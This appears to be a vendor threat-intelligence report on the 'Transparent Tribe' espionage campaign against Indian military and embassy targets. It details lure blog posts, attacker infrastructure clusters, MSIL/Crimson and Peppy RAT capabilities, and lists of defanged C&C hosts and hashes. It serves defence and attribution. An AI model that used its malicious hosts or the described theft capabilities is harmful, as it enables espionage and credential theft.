Technical Analysis section. 5 Figure 5: MSIL/Crimson downloading RAT Fake blog with an Indian military emphasis leads to MSIL/Crimson and more While conducting research related to MSIL/Crimson, Proofpoint researchers discovered a malicious blogspot.com site (Fig. 6), intribune.blogspot[.]com, that appears to have been set up to lure Indian military officials into becoming infected with MSIL/Crimson, njRAT, and possibly other malicious tools. This site is likely operated by the same actor(s) that carried out the previously discussed attacks on Indian embassy officials based on shared C&C infrastructure as discussed in the Cluster Analysis section. Most of the published stories contain some method of directing potential victims to a malicious payload, although a few of the stories did not contain any malicious code at time of analysis. In the following articles from this site, we see the threat actors conducting their malicious activities in multiple ways: 1. Using hyperlinks via an image or text 2. Using the same hypertext link in the article text, on the story\xe2\x80\x99s image, and in an iframe 3. The final article in this section contains a link to an additional website that is likely operated by the same threat actor(s) and connected to other email campaigns Lure articles 4 Sikh Army Officers being trialed in military court on alleged involvement with KLF Link: hxxp://intribune.blogspot[.]com/2015/11/4-sikh-army-officers-being-trialed-in.html Malicious Document Location: hxxp://bbmsync2727[.]com/news/4%20Sikh%20Army%20Officers%20being%20trialed. doc Document: 0197ff119e1724a1ffbf33df14411001 Type: Exploit,CVE-2012-0158,Embedded Payload Dropped: njRAT - 27ca136850214234bcdca765dfaed79f C&C: 5.189.145[.]248:10032 6 Figure 6: Article lure leading to exploit document capable of installing njRAT on vulnerable machines Figure 7: Decoy document dropped by \xe2\x80\x9c4 Sikh Army Officers being trialed.doc\xe2\x80\x9d One notable difference between this article and the rest is that it contained an iframe pointing to the same document linked to via the \xe2\x80\x9cRead More\xe2\x80\x9d hyperlink. This iframe causes visitors to be prompted to download the document immediately upon visiting, as well as from the top level of the malicious website. Figure 8: Iframe linking to malicious document 7 Seventh pay commission recommends overall hike of 23.55% Link: hxxp://intribune.blogspot[.]com/2015/11/seventh-pay-commission-recommends.html At time of analysis, this web page contained no malicious links; however, we discovered a document that was likely either prepared for this page or was previously linked to by this page. Malicious Document Location: hxxp://bbmsync2727[.]com/cu/seventh%20pay%20commission%20salary%20calculator. xls Document: 0e93b58193fe8ff8b84d543b535f313c Additional Document Location: hxxp://bbmsync2727[.]com/cu/awho_handot_2015.xls VBS Location: hxxp://bbmsync2727[.]com/cu/su.exe Payload (older): 07e44ffcffde46ad96eb9c018bed6193 (DarkComet) C&C (older): 5.189.145[.]248:1453 Payload (newer): 708a1af68d532df35c34f7088b8e798f (Luminosity Link RAT) C&C (newer): 5.189.145.248:6318 Figure 9: Article lure with no link but likely lead to DarkComet or other malware 8 Army Air Defence (sic),Engineers and Signal to get additional colonels posts Link: hxxp://intribune.blogspot[.]com/2015/11/army-air-defenceengineers-and-signal-to.html Malicious Document Location: hxxp://birthdaywisheszone[.]com/pml/army-air-defenceengineers-and-signal.doc Document: 68773f362d5ab4897d4ca217a9f53975 Type: Exploit,CVE-2012-0158,Embedded Payload Dropped: dac4f8ba3190cfa1f813e79864a73fe1 (MSIL/Crimson Downloader) C&C: 213.136.87[.]122:10001 Downloaded MSIL/Crimson RAT: f078b5aeaf73831361ecd96a069c9f50 Figure 10: Article lure ultimately leading to MSIL/Crimson RAT 9 Figure 11: Decoy document dropped by \xe2\x80\x9carmy-air-defenceengineers-and-signal.doc\xe2\x80\x9d SC Seeks Army response on batch parity in officers promotion Link: hxxp://intribune[.]blogspot[.]com/2015/09/sc-seeks-army-response-on-batch-parity.html Malicious Document Location: hxxp://www[.]avadhnama[.]com/latest/batchparity-command-exit-policy.doc Unfortunately we have not been able to retrieve the document hosted at that location; however, another file was located in the same directory: Location: hxxp://avadhnama[.]com/latest/ssbs.exe Hash: df6b3946d1064f37d1b99f7bfae51203 (MSIL/Crimson Downloader) C&C: 213.136.87.122:10001 Downloaded MSIL/Crimson RAT: c2bc8bc9ff7a34f14403222e58963507 10 Figure 12: Article lure possibly leading to MSIL/Crimson RAT Seniors Juniors and coursemates please take a serious note about it Location: hxxp://intribune[.]blogspot[.]com/2015/05/seniors-juniors-and-coursemates-please.html Potential Payload Location: hxxp://sms[.]totalworthy[.]com/intribune.zip Unfortunately we have been unsuccessful in retrieving intribune.zip and are unsure what, if any, payloads it may have contained. 11 Figure 13: Article lure leading to likely malicious payload in the past AWHO\xe2\x80\x93 Defence (sic) and Para-Military Forces Personnel Plots Scheme 2016 Link: hxxp://intribune[.]blogspot[.]com/2015/07/awho-defence-and-para-military-forces.html Malicious Document Location: hxxp://bbmsync2727[.]com/upd/AWHO-Upcoming-Projects.doc Document: 1f82e509371c1c29b40b865ba77d091a Type: Exploit,CVE-2012-0158,Embedded Payload Dropped: 643d6407cd9a4f1c6d2742f24aed34f5 (MSIL/Crimson Downloader) C&C: 213.136.87.122:10001 Downloaded MSIL/Crimson RAT: 0e3e81f4d2054746f74442075f82a5c5 12 Figure 14: Article lure ultimately leading to MSIL/Crimson and another malicious website 13 The AWHO article contains a link to hxxp://cdrfox[.]xyz/ via the \xe2\x80\x9cGET CALL DETAIL RECORDS ONLINE\xe2\x80\x9d hyperlink. This website is likely operated by the same actor(s) and is capable of delivering a VBS-based malicious document to unsuspecting victims (Fig. 15). Again, there is an obvious India-targeted theme that suggests this malicious website is specifically targeted at that nation. After using the number submission form, victims are directed to another page containing the final link to download a malicious document (Fig. 16). Figure 15: Landing page for cdrfox[.]xyz 14 Figure 16: Download File lure containing document that ultimate leads to Crimson Downloader Document Details Location: hxxp://fileshare[.]attachment[.]biz/?att=1455255900 Document: 18711f1db99f6a6f73f8ab64f563accc Document Name: \xe2\x80\x9cCall Details Record.xls\xe2\x80\x9d Type: VBS Macro VBS Location: hxxp://afgcloud7[.]com/logs/ssc.mcom Payload: 3cc848432e0ebe25e4f19effdd92d9c2 (MSIL/Crimson Downloader) Downloaded MSIL/Crimson RAT: 463565ec38e4d790a89eb592435820e3 Additional payloads were found on the same server but in a different directory: hxxp://afgcloud7[.]com/com/psp.dlc-bk (hash: 62d254790834f30a79ee79305d9be837, also previously named psp.dlc) hxxp://afgcloud7[.]com/com/psp.dlc (hash: dd0fc222852f5d12fda2fb66e61b22f6)hxxp://afgcloud7[.]com/upld/updt.dll (hash: 0ad849121b4656a239e85379948e5f5d) Both files in the \xe2\x80\x9c/com/\xe2\x80\x9d directory are malicious droppers that ultimately drop a decoy Excel spreadsheet and a MSIL/Crimson downloader. The spreadsheet is themed towards the Armed Forces Officials Welfare Organization (AFOWO) located in India, while the dropped downloader and downloaded RAT communicate with the same C&C as many of the previously discussed samples. An Excel spreadsheet named \xe2\x80\x9cAFOWO Broucher 2016.xls\xe2\x80\x9d (hash: 98bdcd97cd536ff6bcb2d39d9a097319) was also found containing a malicious macro that attempts to download a payload from hxxp://afgcloud7[.]com/com/psp.dlc . Additionally, the IP address (50.56.21[.]178) resolved from email. books2day.com (used in the embassy attacks). This IP has also recently resolved to email.afowoblog[.]in. We would not be surprised if an email address using @afowoblog.in was used to send the malicious \xe2\x80\x9cAFOWO Broucher 2016.xls\xe2\x80\x9d spreadsheet. Additional research related to this domain is provided in the Cluster Analysis section. 62d254790834f30a79ee79305d9be837 / dd0fc222852f5d12fda2fb66e61b22f6: Dropped Decoy Dropper: 29054da7a1f1fbd0cb3090ee42335e54 Decoy Document: 66cd38a03282b85fceec42394190f420 Payloads: 83a8ce707e625e977d54408ca747fa29 or 2c9cc5a8569ab7d06bb8f8d7cf7dc03a (both MSIL/Crimson Downloader) C&C: 213.136.87.122:10001 Downloaded MSIL/Crimson RAT: 463565ec38e4d790a89eb592435820e3 0ad849121b4656a239e85379948e5f5d The payload found in the \xe2\x80\x9c/upld/\xe2\x80\x9d directory (md5: 0ad849121b4656a239e85379948e5f5d) is the MSIL/Crimson SecApp module capable of downloading the full MSIL/Crimson RAT and all subsequent modules. Additionally, this payload drops a decoy document (Fig. 17) with the filename: \xe2\x80\x9cCv of IMA Chief.docx\xe2\x80\x9d (hash: 8e5610d88c7fe08ac13b1c9f8c2c44cc). The decoy document contains information regarding a possible Brigadier General whose last and current position (according to the decoy) is the Chief of International Military Affairs Department Ministry Defence (sic) of Afghanistan. 15 Figure 17: Decoy document dropped by 0ad849121b4656a239e85379948e5f5d Cluster Analysis In this section we will present our research surrounding the use of the MSIL/Crimson implant and campaigns that are part of Operation Transparent Tribe. Even though the tool may possibly be used by several threat actors, our research indicates that the hundreds of Crimson samples may be clustered into a much smaller set of activity as described below. Cluster 1 - Operation Transparent Tribe and More The first cluster is the largest with activity from over one hundred samples dating as far back as 2012 (Fig. 18). For this cluster, we started our analysis beginning with the email attacks on the Indian embassies and the fake Indian news blog. The activity surrounding those two events uncovered numerous other samples hosted on attacker-controlled C&C that then lead to at least one additional email attack campaign. On one of the C&Cs we discovered a Python-based RAT (Python/Peppy) whose activity very closely clusters to Operation Transparent Tribe. We have also observed this RAT being downloaded and executed along with MSIL/Crimson by Andromeda downloaders. In addition to Crimson and Peppy, we have observed the usage of Luminosity Link RAT, njRAT, Bezigate, Meterpreter, and several custom downloaders. 16 Figure 18: Maltego graph of cluster 1 activity (click here for the complete graph) The attackers responsible for this activity appear have to used a mixture of compromised infrastructure (e.g., sahirlodhi[.] com) and infrastructure owned solely by them (e.g., bbmsync2727[.]com). In many cases, the attackers used common patterns in naming their domains: \xe2\x80\xa2 sync in domain name and file name \xe2\x80\xa2 Repeated use of bb in domain name or filename, mostly bbm \xe2\x80\xa2 Ending second level domain names in four digits Additionally, this cluster of activity has numerous instances where Contabo GmbH was used for C&C. However we never used that as a sole item to group activity together under this cluster. Next, we will discuss an additional email attack, the attachment.biz activity, and lastly the afowoblog.in domain, all of which we believe fall into this cluster. Email campaign using \xe2\x80\x9c2016 Pathankot attack\xe2\x80\x9d Lure While researching this activity, we discovered an additional email attack campaign using the 2016 Pathankot attack as a lure (Fig. 19). This attack utilized a URL (hxxp://comdtoscc.attachment[.]biz/?att=1451926252) to deliver a compressed file (md5: f689471d59e779657bc44da308246ac4) containing two MSIL/Crimson payloads using 193.37.152[.]28:9990 as their C&C. Figure 19: email campaign using \xe2\x80\x9c2016 Pathankot attack\xe2\x80\x9d as a lure The attackers further increased the believability of their attack by including decoy files with each of the MSIL/Crimson payloads: Sample 1: 65f6143d69cb1246a117a704e9f07fdc Original name: \xe2\x80\x9cCall Record and Tracking Route.scr\xe2\x80\x9d Dropped decoy: 2f821d8c404952495caae99974601e96,Audio file with image (Fig. 20) Decoy name: \xe2\x80\x9cCall Record and Tracking Route.mp3\xe2\x80\x9d https://www.proofpoint.com/sites/default/files/fig-18-separate.png https://en.wikipedia.org/wiki/2016_Pathankot_attack 17 Figure 20: Audio file decoy, likely discussing Pathankot attack Sample 2: 723d85f905588f092edf8691c1095fdb Original name: \xe2\x80\x9cdetail behind the scenes.scr\xe2\x80\x9d Dropped decoy: a523b090e9a7e3868d8d1fde3e1ec57d,PDF (Fig. 21) Decoy name: \xe2\x80\x9cdetail behind the scenes.pdf\xe2\x80\x9d 18 Figure 21: Pathankot attack decoy 19 ATTACHMENT.BIZ domain We discovered additional activity surrounding the attachment.biz domain that is being used to deliver malicious documents and payloads. The observed domains include: \xe2\x80\xa2 fileshare.attachment[.]biz \xe2\x80\xa2 comdtoscc.attachment[.]biz \xe2\x80\xa2 ceengrmes.attachment[.]biz \xe2\x80\xa2 email.attachment[.]biz (no links discovered) All of the domains resolve to the same IP, 91.194.91[.]203 (Contabo GmbH). So far we have detected three separate campaigns, although we\xe2\x80\x99re unsure of the starting point for each of these incidents but are highly confident they exist in this cluster of activity. Link 1: hxxp://ceengrmes.attachment[.]biz/?att=1450603943 Payload: 07defabf004c891ae836de91260e6c82, MSIL/Crimson Payload name: Accn Letter.scr C&C: 5.189.143[.]225:11114 Link 2: hxxp://fileshare.attachment[.]biz/?att=1455264091 Payload: 18711f1db99f6a6f73f8ab64f563accc,XLS VBS-downloader * Payload name: Air India Valid Destinations.xls *Same payload as delivered by hxxp://fileshare[.]attachment[.]biz/?att=1455255900 from the attacker\xe2\x80\x99s cdrfox.xyz site Link 3: hxxp://comdtoscc.attachment[.]biz/?att=1453788170 Payload: 45d3130a901b7a763bf8f24a908b1810,compressed archive Payload name: Message.zip Decompressed Payload: 765f0556ed4db467291d48e7d3c24b3b, MSIL/Crimson Decompressed payload name: Message.scr C&C: 193.37.152[.]28:9990 AFOWOBLOG.IN Domain We have uncovered circumstantial evidence indicating that the afowoblog.in domain falls into this cluster of activity. The domain was registered on or near February 24th, 2016 using the email address thefriendsmedia@gmail.com, which is also close to the same day that the \xe2\x80\x9cAFOWO Broucher 2016.xls\xe2\x80\x9d attachment was uploaded to VT. We have detected potentially connected activity as far back as June 2013 using the domain thefriendsmedia[.]com , where it was used as an Andromeda C&C. In one instance (Fig. 22, maltego graph), we observed an Andromeda payload communicate with brooksidebiblefellowship[.]org to retrieve an additional Andromeda payload from lolxone[.]com that then used thefriendsmedia[.]com as its C&C. The original Andromeda also retrieved a Bezigate payload. 20 Figure 22: thefriendsmedia connection to Andromeda, lolxone[.]com, and Bezigate Furthermore, we have observed lolxone[.]com hosting additional Bezigate payloads as well as the Python/Peppy malware as shown in the graph below (Fig. 23). This activity can be further connected to the overall cluster via the Peppy, Bezigate, and Andromeda C&Cs as shown in the complete Maltego graph (Fig. 25). 21 Figure 23: lolxone[.]com and Andromeda connections to Python/Peppy, Bezigate Cluster 2 - guddyapps/appstertech/sajid Some Crimson SecApp modules we came across did not download the expected RAT or downloader payload when it first communicated to its C&C. For example, sample: 85429d5f2745d813e53b28d3d953d1cd retrieved a downloader from 178.238.228[.]113:7861 . Once the downloader was executed, it then downloaded an XMPP library (md5: fee34da6f30a17e1fcc5a49fd0987169) and the XMPP-based Trojan (md5: d3094c89cad5f8d1ea5f0a7f23f0a2b1) we refer to as Beendoor. Beendoor is a very interesting piece of malware and we were able to gather additional information about this variant's C&C, 178.238.235[.]143. Much like Crimson and Peppy, Beendoor is capable of taking screenshots of the victims desktop. On Beendoor\xe2\x80\x99s C&C we were able to recover a screenshot that appears to have been taken from one of the malware developer\xe2\x80\x99s computer (Fig. 24). In this modified screenshot we are bringing attention to a few key pieces of information: \xe2\x80\xa2 Identical \xe2\x80\x9cAnushka\xe2\x80\x9d image on desktop found on Beendoor C&C and used in Beendoor sample \xe2\x80\xa2 Folder structure similar to that found on the C&C \xe2\x80\xa2 Hardcoded paths found in Beendoor dropper binary (md5: 9b98abb9a9fa714e05d43b08b76c0afa) \xe2\x80\xa2 Same file names used by Beendoor and the XMPP library 22 Figure 24: Screenshot of likely Beendoor developer\xe2\x80\x99s desktop As shown in the figure, it seems likely that the Pakistan-based company Appstertech is somehow connected to the Beendoor malware. Based on the analysis of the folders and files on the Beendoor C&C, we can also conclude that this activity is related to research published by CloudSek late last year. In the Crimson samples that we found connected to Beendoor (Fig. 25), several of them used the same \xe2\x80\x9cBinder\xe2\x80\x9d dropper that we observed in other clusters, including Cluster 1. Moreover, the C&C for this occurrence of Crimson and Beendoor are both hosted at Contabo GmbH, another similarity with other clusters surrounding the Crimson implant. Figure 25: Maltego graph of Crimson<->Beendoor cluster Cluster 3 - \xe2\x80\x9cNadra attack in Mardan\xe2\x80\x9d Lure In addition to the attack using the recent Pathankot attack as a lure, we discovered several samples that may have been used in recent attack campaigns utilizing the December attack in Mardan near a National Database and Registration Authority (Nadra) as a lure. Several samples were uploaded to VT in compressed archives containing Crimson payloads along with possible decoys their respective droppers would have dropped. For example, one of the payloads (md5: 51c57b0366d0b71acf05b4df0afef52f, \xe2\x80\x9cNADRA OFC.exe\xe2\x80\x9d) was uploaded to VT along with an image (md5: be0b258e6a419b926fe1cfc04f7e575a) that can also be found here: hxxp://i.dawn[.]com/ medium/2015/12/56825d6d8f1a5.png which is linked to by an article about the attack: hxxp://www.dawn[.]com/ news/1229406 For this cluster of activity, we\xe2\x80\x99re not currently aware of any droppers and so have decided to cluster it on its own. With that in mind however, the TTPs for this campaign are nearly identical to the \xe2\x80\x9cPathankot attack lure\xe2\x80\x9d campaign in Cluster 1. Unsurprisingly, the C&C utilized in this campaign is hosted at Contabo GmbH. Lastly, the port used in these samples, 11100, is the same port used by some of the samples we have grouped in Cluster 1. 23Threat Insight | Operation Transparent Tribe Cluster 4 - DDNS and Pakistan The final cluster we would like to discuss include several samples all using DDNS for their C&C pointing to Pakistan IP (according to Whois) addresses. The majority of this activity is from 2013. Based on the slightly different TTPs (purely DDNS usage) and no use of Contabo GmbH, we have clustered this separately from other activity, even though we have observed DDNS usage in Cluster 1 and the obvious overlap in tool usage. This activity is graphed in Figure 26 and included in the IOCs section. Figure 26: DDNS and Pakistan IP address Maltego graph One Cluster to Rule Them All, Nothing Yet to Bind Them... There are numerous overlaps between the clusters, including usage of the \xe2\x80\x9cBinder\xe2\x80\x9d dropper, attack lures, and most obvious, the usage of Contabo GmbH. Unfortunately we lack information regarding some of the found samples as far as how they were used and in what campaigns, and so we have decided not to tie all the activity together. As we continue to research these incidents, we would not be surprised to find additional information linking all clusters together. Technical Analysis MSIL/Crimson Crimson is modular in the sense that additional payloads downloaded by the main RAT module are often utilized to perform functions such as keylogging and browser credential theft. Crimson infections also typically occur in stages. Crimson\xe2\x80\x99s first stage is a downloader component whose primary purpose is to download a more fully featured RAT, typically being the Crimson RAT component. The RAT component will then send system information to the C&C while the C&C will likely respond with additional module payloads. Crimson utilizes a custom TCP protocol for communicating to C&C (Fig. 27). Some of Crimson\xe2\x80\x99s optionally downloaded modules have no C&C capability and instead rely on the RAT component for information exfiltration. Figure 27: Crimson custom TCP C&C protocol 24 Crimson-infected victims may be spied on by their attackers via invasive methods such as through their webcam, stealing email from Outlook, and recording their screen. Some Crimson RAT variants support at least 40 individual commands, while all the individual commands throughout the different versions of the RAT we researched are listed and described in Table 1. Table 1. MSIL/Crimson supported commands Command Description afile Exfiltrate file to C&C audio Download legitimate NAudio library from C&C, save as NAudio.dll (not executed or added to startup). Used to record audio from microphone. autf Add extensions to file extensions list. Optionally search for files in extensions list and exfiltrate autoa Exfiltrate all files with an extension matching the file extensions list capcam Capture still from webcam camvdo Continuous capture from webcam (stopped with stops command) clping set runTime to DateTime.Now clrklg Stop keylogger and delete keylogs cnls Stop upload, download, and screen capture cscreen Single screenshot delt Delete provided path/file dirs Send disk drives dotnet Download URLDownload payload, save as dotnetframwork.exe and add to startup via registry dowf Retrieve file from C&C dowr Retrieve file from C&C and execute email Capable of retrieving email account name, number of emails, and exfiltrate emails from Outlook endpo Kill process given PID fbind Save file from C&C in existing directory with .exe appended to name file Exfiltrate file to C&C filsz Send file info: CreateTimeUtc, File Size fldr List folders in a directory fles List files in a directory ftyp Add extensions to file extensions list info Send PC info (MAC, PC Name, User, LAN IP, OS, AV, missing modules\xe2\x80\xa6) klgs Sometimes not implemented but command exists (previous versions: enable automatic exfiltration of keylogs) listf Search for files with given extension(s) mesg Pop-up \xe2\x80\x9cAlert\xe2\x80\x9d box with provided message msdlf Click mouse muspo Move mouse cursor https://naudio.codeplex.com/ 25 obind Save file from C&C to directory with .exe appended to name outdwn Search for specific email attachment with specified name and exfiltrate passl Retrieve password logger logs procl List processes runf Execute command rupth Retrieve malware\xe2\x80\x99s run path savaf Save file from C&C scren Capture screen continuously scrsz set scrSize (utilized by scren and cscreen) secup Download \xe2\x80\x9csecApp\xe2\x80\x9d payload from C&C, add to startup via registry sndpl Download \xe2\x80\x9cpssApp\xe2\x80\x9d from C&C (browser credential stealer) and begin log exfiltration sndps Download \xe2\x80\x9cpssApp\xe2\x80\x9d from C&C (browser credential stealer) splitr Split file to provided number of splits, however we believe due to programmer error this functionality will not work as expected stops Stop screen capture stsre Get microphone audio sysky Exfiltrate keylogs to C&C systsk Update module, likely secApp thumb Get 200x150 GIF thumbnail of image uclntn Sets RegKey: [variable]_ver to provided value, possibly used as a version indicator udlt Download \xe2\x80\x9cremvUser\xe2\x80\x9d payload from C&C, save as msupdate.exe, then execute it uklog Download keylogger payload from C&C, save as win_services.exe then add to start up via registry updatc Download controller/client/main RAT, save as servicesdefender.exe, then execute it updatu \xe2\x80\x9cOR\xe2\x80\x9d usbwrm Download USB payload, save as udriver.exe then add to start up via registry MSIL/Crimson Module Analysis As previously mentioned (and shown in the commands table), Crimson relies on additional module payloads to further enrich its feature set. These modules include keylogging, browser credential theft, automatic searching and stealing of files on removable drives, and two different payload update modules. Lastly, there appears to be a module referred to as \xe2\x80\x9cremvUser\xe2\x80\x9d that we have not been able to locate. URLDownload When executed, this module will first check for the existence of a registry key: HKCU\\SOFTWARE\\Microsoft\\Windows\\ CurrentVersion\\last_edate . If the key does not exist then it will be created by the module and assigned a DateTime.Now string. This key is periodically checked for how many days have passed. Once the malware detects that at least 15 days have passed, a HTTP GET request is sent to a hardcoded location to retrieve a text file that should point to another HTTP location containing a final payload. For example, one analyzed sample (md5: 532013750ee3caac93a9972103761233) contained a hardcoded URL: hxxp://sahirlodhi[.]com/usr/api.txt. So far we have observed the attackers modify api.txt twice, first containing a link to: hxxp://bbmsync2727[.]com/upd/secure_scan.exe and then: hxxp://bbmsync2727[.]com/ 26 ccmb/ssm.exe . In the module that we analyzed, the downloader logic was configured to request a file from a hardcoded URL: hxxp:// sahirlodhi[.]com/usr/api.txt , which is likely a compromised website. The module expects that another URL will be stored at the previously retrieved URL, which initially we found to be the following: hxxp://bbmsync2727[.]com/upd/secure_scan. exe (md5: e456d6035e41962a4e49345b00393dcd). This payload is a MSIL/Crimson Downloader variant that, when executed, will begin the MSIL/Crimson lifecycle all over again by downloading a new controller/orchestrator. secApp The secApp that we analyzed (md5: ccfd8c384558c5a1e09350941faa08ab) contained functionality very similar to the initial downloader, however the initial beacon that is sent to the C&C was doupdat rather than updatc and was configured to connect to the same hardcoded C&C but to a different port. In addition to supporting the updatc command issued by the C&C, this module also supports the following commands: info, upsecs, and upmain. The info command supports the same functionality that the main RAT module supports while upsecs and upmain allows the controller to modify the path and application names for both the secApp and mainApp. Credential Stealer The pssApp is a password harvesting module that initially appears to support retrieving saved credentials from the Chrome, Firefox, and Opera browsers. Successfully harvested credentials are stored in a hardcoded location such as: %APPDATA%\\Roaming\\chrome\\chrome_update . If no credentials are found, the credential log will simply contain \xe2\x80\x9cNot Found> > <\xe2\x80\x9d while an example of successfully stolen credentials are shown in Figure xx. In our very limited testing, this module was not able to retrieve passwords from Opera 35.0.2066.68 or Firefox 44.0.2 but was successful with Chrome 48.0.2564.116 m. Figure 28: Successfully harvested credentials by the pssApp module Some samples (md5: 8a991eec65bd90f12450ee9dac0f286a) also appear to support the retrieval of credentials from Windows Live, FileZilla, Vitalwerks\xe2\x80\x99 Dynamic Update Client (DUC), and Paltalk. Keylogger The keylogger module is a basic keylogger that stores keylogs in a plain text file (Fig. 29) in a hardcoded location. The module that we analyzed (md5: f18172d7bb8b98246cb3dbb0e9144731) was hardcoded to store keylogs in a file named \xe2\x80\x9cnvidia\xe2\x80\x9d in the following location: %APPDATA%\\NVIDIA\\ . Figure 29: Data stored in \xe2\x80\x9cnvidia\xe2\x80\x9d keylog 27 USB Module If either the updatu or usbwrm commands are issued, a USB drive module may be downloaded and set to execute on next startup. In the payload that we analyzed, the purpose only appears to search for potentially interesting files in removable storage and copy them to the local disk, likely so they may be exfiltrated at a later time. This payload may be configured with a set of file extensions (Fig 30) that are used to search for matching files on any USB drives. If any files are found, they are copied to a configured directory on the local disk while a running list of copied files are stored in a separate log so duplicate files are not copied. The anti-duplication method, however, only utilizes filenames so in the event that an already copied file is later modified, a newer copy will not be saved for exflitration. Despite one of the commands that may be used to download this payload may indicate this payload to contain \xe2\x80\x9cworm\xe2\x80\x9d functionality, that does not appear to be the case. remvUser During our research, we were not able to locate this module; so we are not sure what its functionality is. A best guess is that it could be a clean-up/implant removal utility. Python/Peppy Peppy is a Python-based RAT with the majority of its appearances having similarities or definite overlap with MSIL/ Crimson appearances. Peppy communicates to its C&C over HTTP and utilizes SQLite for much of its internal functionality and tracking of exfiltrated files. The primary purpose of Peppy may be the automated exfiltration of potentially interesting files and keylogs. Once Peppy successfully communicates to its C&C, the keylogging and exfiltration of files using configurable search parameters begins (Fig. 30). Files are exfiltrated using HTTP POST requests (Fig. 31). Figure 30: Peppy configurable search parameters Figure 31: Peppy exfiltrating files 28 In addition to keylogging and the exfiltration of files, Peppy is also capable of accepting commands from its C&C to update itself, disable itself, exfiltrate a specific file, uninstall itself, execute a shell command, take screenshots, spawn a reverse shell, and download a remote file and execute it. In addition, we have discovered a simple Python-based downloader (md5: 82719f0f6237d3efb9dd67d95f842013) that was possibly written by the author(s) of Peppy based on code overlap between the downloader\xe2\x80\x99s functionality and Peppy\xe2\x80\x99s download_exec routine (Fig. 32, 33). Figure 32: Python downloader code Figure 33: Peppy download_exec routine and MyURLOpener class Conclusion As we described, there are clearly a number of common threads throughout these attacks. We have been able to connect campaigns, vectors, payloads, and, in some cases, infrastructure, but additional details continue to emerge. In the short term, this serves as an important reminder that wars are no longer waged solely on the ground or in the air. Rather, threat actors (whether from nation-states or private parties with interests in international conflicts) will use a variety of cyber tools to achieve their goals. 29 Appendix Cluster 1 IOCs Crimson Downloader Samples 032bacaea0d335daec271f228db6bc88 052eb62056794a08a04f4cd61455602c 06c18c72f9f136bacc5c9b0d8fa93195 0a8d414eb910eb4caeb96a648b70eef3 0b651ef0eb7b919e91a2c5c5dbccd27e 0ed7f485166796e10bcb9123de24d211 17dbd878985b78848d4a3a758a3ef89c 1af4df1382c04677050379ccdafcafd2 21fc043b31d22b5c3f5529db83e90422 2c9cc5a8569ab7d06bb8f8d7cf7dc03a 340f31a36e159e58595a375b8b0b37b2 34ad98510d4d6e24b7e38f27a24ad9f6 3a67ebcab5dc3563dc161fdc3c7fb161 3b08095786731c522f5649081f8dbb7e 3cc848432e0ebe25e4f19effdd92d9c2 41a0e4f9745e4bd5ad7b9d500deb76fa 428371be27fc057baac3ea81a8643435 535888163707b60c1a8dfefffad70635 53c10ac66763739b95ac7192a9f489ad 5b6beb9ee6e604f4e474b8129e6135f4 5c6b401979469040b39babb0469fc0c8 5d038817ffeab7715415d68d438af345 5ff65fdefe144800e43a2f6cc6244c75 6c3b38bf90a203b2f7542d0359b8e60e 6d2442494c3019f1597256cbeb45e5f6 6eb40b2e6a67a785d5cc6e4ad9102b5d 7289c160582f010a3c7dbd512c5d8a09 75b390dc72751a062e8106328450ef87 796ae0b75c0e0b08ea84668495df4070 7a6b88e43cccc8133c066b87f72c53f7 803d2758c3b89882e2d41867768d7b15 83a8ce707e625e977d54408ca747fa29 85e2c950ddb18fe1dd18709cfbb9b203 94770186027a0ccdf733b72894a0c7d0 9d4504cdb7b02b9c9fffefcf9b79101d ac637313520ca159a02d674474d341ef b67411da3ddfcae9f2a20935619e5c4a b8098acf09d121ab298351f0c804ef8b bf1400105c97a28fefd33d8c0df5d4c1 c61061a40dba411b839fe631299c267a ca27cefe404821ccd8dc695da55102e8 cdc6bb98a2629338d49587d186562fd3 dac4f8ba3190cfa1f813e79864a73fe1 df6b3946d1064f37d1b99f7bfae51203 e3254ad0275370f92cffeacbf603a905 e456d6035e41962a4e49345b00393dcd edccbc7f880233de987ba4e917877df2 eee91d8de7ea7c0ac3372f65c43e916a 30 Crimson Downloader Droppers 9e0fef5552100a7e0a2d044b63736fb2 7470757050f584101a851d7ba105db31 Crimson SecApp Samples 07defabf004c891ae836de91260e6c82 0ad849121b4656a239e85379948e5f5d 0ed7f485166796e10bcb9123de24d211 1911c1234cc2918273baeffd7d37392e 2d6d0dbd8ac7c941d78ba14289a7ab9d 43b39b40605afb9d2624f1cede6b48a8 65f6143d69cb1246a117a704e9f07fdc 723d85f905588f092edf8691c1095fdb 765f0556ed4db467291d48e7d3c24b3b 9b3cb979b1397a4a13ea62dbf46510d8 9fcc3e18b9c0bd7380325f24a4623439 b4080cda4fb1b27c727d546c8529909c ca77af41cbd8c2fd44085d0d61bac64b df6be8accc487bf63260aacf5e582fe2 Crimson RAT Samples 073889fe855f401c3c4cc548bc08c502 0964887f6f709f9c3f11701412acb9c1 14be26aa207cff81ff814c8a7a8e2f03 19b9f62f29f3689b1db4c56deed7e162 1a1426a94e37e5f3c14cd2b6740e27e1 3ff165ee68d1bc03ae7d4d3baf99b963 4297041e3a701ed8c01e40d6c54264a1 43f47d2045ca98265fd4bd4011a04932 463565ec38e4d790a89eb592435820e3 5371d2984cbd1ae8283f9ae9eeee718d 53a60acc6a09a7fa2eebf4eb88c81af5 59e0fc469d1af7532507c19b47f19960 6746c430f978d0bc9bbecff87c651fa2 71b4bbddf46e1990210742a406c490bf 7e42de66eee8d280a3ba49d5b979c737 811eb99fb1aca98052db4b78c288889c 819715180810caaaa969c816eb2b7491 8317bb3d192c4495507a5945f27705af 8c713cffdc599930a9236c2d0d0ee91a 92f78a182faf26550d6fab2d9ec0692d 943f35200dce22766d0c2906d25be187 94d29dded4dfd920fc4153f18e82fc6c 9fd2838421b28674783b03eb46f4320f a3aa3a12d81c9862b18f83a77d7215ca bcbac2241977c976aec01592fb514aa4 c2bc8bc9ff7a34f14403222e58963507 cb0768c89e83f2328952ba51e4d4b7f1 d53de7c980eb34f9369e342d5d235c9b e7803020e9697d77f165babecf20ea82 eaee83a376914616924eab9b4b96b050 ed1daf18ef09fb2a5c58ab89824ecab0 f078b5aeaf73831361ecd96a069c9f50 fe955b4bbe3b6aa2a1d8ebf6ee7c5c42 31 Crimson C&C 5.189.143[.]225 5.189.167[.]65 80.241.221[.]109 93.104.213[.]217 193.37.152[.]28 213.136.87[.]122 Peppy RAT Samples 010a50145563a6c554de12b8770f16f7 010aa8d6e6f5346118546b1e4e414cb2 131b4ed3df80e2f794a3e353e2c7f8fb 17d22686bfc825d9369a0751c4cc6a22 1d49dc6af6803d9ffc59a859315b2ac4 22192141d2010fe9fed871d05573dda4 23ec916b3eae3f88853bde8081be870f 2463d1ff1166e845e52a0c580fd3cb7d 